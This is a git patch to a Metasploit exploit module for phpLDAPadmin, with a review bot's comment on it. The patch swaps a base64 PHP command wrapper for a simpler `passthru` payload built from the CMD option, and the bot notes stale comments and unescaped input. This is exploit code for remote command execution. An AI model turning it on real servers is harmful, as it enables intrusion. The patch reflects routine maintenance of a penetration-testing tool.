From 7ba5a8ec4eed4162e65ac586805254cf0a1da0ba Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Tue, 25 Oct 2011 16:04:33 +0000
Subject: [PATCH] Module is busted when it loads, restoring to the original method. Mixin should not be loaded into an exploit
git-svn-id: file:///home/svn/framework3/trunk@14061 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../multi/http/phpldapadmin_query_engine.rb | 13 ++-----------
 1 file changed, 2 insertions(+), 11 deletions(-)
diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
index 3fb34425ef..76504228a3 100644
--- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb
+++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
@@ -15,7 +15,6 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpClient
- include Msf::Payload::Php
 def initialize(info = {})
 super(update_info(info,
@@ -109,16 +108,8 @@ class Metasploit3 < Msf::Exploit::Remote
 # if we are using the exec CMD stager
 # important to check which php functions are disabled
 if datastore['CMD']
- cmd = Rex::Text.encode_base64(datastore['CMD'])
- dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
- out = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
- shell = <<-END_OF_PHP_CODE
- $c = base64_decode("#{cmd}");
- #{php_preamble({:disabled_varname => dis})}
- #{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis, :output_varname => out})}
- echo #{out};
- END_OF_PHP_CODE
- p = Rex::Text.encode_base64(Rex::Text.compress(shell))
+ p = "passthru(\"%s\");" % datastore['CMD']
+ p = Rex::Text.encode_base64(p)
 else
 p = Rex::Text.encode_base64(payload.encoded)
 end
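Review bot: The two comment lines kept above `if datastore['CMD']` in the second hunk are now stale: they say it is important to check which PHP functions are disabled, but the new branch calls `passthru` unconditionally and no longer makes that check. I would reword them to something like `# CMD is run through passthru() only; no disabled-function check is made`. The new `"passthru(\"%s\");" % datastore['CMD']` also puts the option value unescaped inside a double-quoted PHP string, whereas the removed lines passed it base64-encoded, so a value containing `"`, `\` or `$` will presumably not reach PHP as typed; that limitation deserves a comment as well. The enclosing method starts and ends outside the hunk.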